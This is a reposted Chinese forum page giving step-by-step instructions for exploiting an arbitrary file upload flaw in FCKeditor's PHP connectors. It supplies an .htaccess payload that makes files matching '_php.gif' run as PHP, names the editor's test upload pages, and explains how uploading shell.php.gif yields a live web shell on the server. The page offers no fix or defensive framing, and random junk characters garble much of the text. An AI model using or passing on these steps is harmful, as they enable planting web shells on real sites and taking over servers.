FCKeditor所有php版本Upload上传漏洞/ L4 F6 o; Z8 a' G. z; \* G
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07, ^: l. z! T& k2 j
减小字体 增大字体
" ~6 @) `0 y' H; |2 c, }3 j2 H[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
$ G6 k8 C( [) w" X9 _[+] Date: 2011; h! w- _3 g5 p/ D1 }
[+] Author : sinesafe.cn
d% k/ G* |. C$ d" U[+] Website : WwW.sinesafe.cn% j" c: c( m/ T3 Q8 I5 A# D! F$ y6 [
———————————————————
2 ]3 f; h8 y6 U/ m8 Z9 W$ y1.create a htaccess file:1 E. Z3 ?' F( l
code:
, |; P" W$ k- E. e/ A, ?<FilesMatch “_php.gif”>, c' U# w' c2 J" }) f
SetHandler application/x-httpd-php
5 N9 v2 w2 R7 i4 m5 E6 J</FilesMatch>+ ^ J2 N: P( v
; C: a6 o$ K' Y2 }# S( v2.Now upload this htaccess with FCKeditor.8 d, `+ X! D* w" `
6 }" L" ^% ] c; \+ a4 b2 m
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html8 v L3 l0 m" K7 z6 ]
" t# y- x8 B r- I, A* e( T% ohttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html6 T J: J: p9 _# J$ h
: v: o2 @2 m T% J* @———————————————————————————————-2 m% v- y0 D$ R# J8 y( k
3.Now upload shell.php.gif with FCKeditor.7 d- h' B2 n; S! [6 N1 s
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.2 A A1 D* M1 J8 I! b
5.http://www.sinesafe.cn/anything/shell_php.gif
2 C4 g \* Y# W6 z x3 d/ H+ o6 Z6.Now shell is available from server. |
1 c @2 v5 S. `
' X- p# o7 I+ `- d @
0 d' g2 H9 A" [. \- D+ G+ s |
发表于 2013-10-27 17:25:21
收藏
分享
支持
反对